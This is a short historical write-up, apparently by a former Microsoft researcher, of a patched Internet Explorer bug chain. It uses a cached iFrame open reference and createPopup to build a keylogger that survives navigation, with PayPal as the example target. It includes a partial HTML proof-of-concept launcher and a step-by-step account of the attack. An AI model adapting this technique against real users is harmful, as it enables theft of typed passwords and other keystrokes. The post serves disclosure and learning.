This one combined several of the techniques I had been exploring — a cached iFrame open reference, a background navigation, and a createPopup — into a persistent in-tab keylogger. The popup would capture every keystroke the user typed within the tab, surviving any number of navigations, until the tab was closed.
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<title>KeyLogger_Resident_createPopup_Captures_KeyStrokes</title>
</head>
<body>
<script language="JavaScript">
function main()
{
window.open("dummy_iframe.html");
}
function runScript()
{
iOpen("createpopup.html", "_top");
}
</script>
</body>
</html>The attack worked in three steps. First, a new tab was opened with dummy_iframe.html, which contained an iFrame and saved the iFrame’s open method as opener.iOpen, then navigated the tab to PayPal (or any other site). Second, the main page called iOpen("createpopup.html", "_top"), which loaded createpopup.html into the iFrame’s slot — even though the tab had navigated away — because the cached open reference still worked. Third, createpopup.html created a createPopup covering the tab and attached a keydown listener to log everything typed. The popup survived subsequent navigations within the same tab, silently collecting keystrokes.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.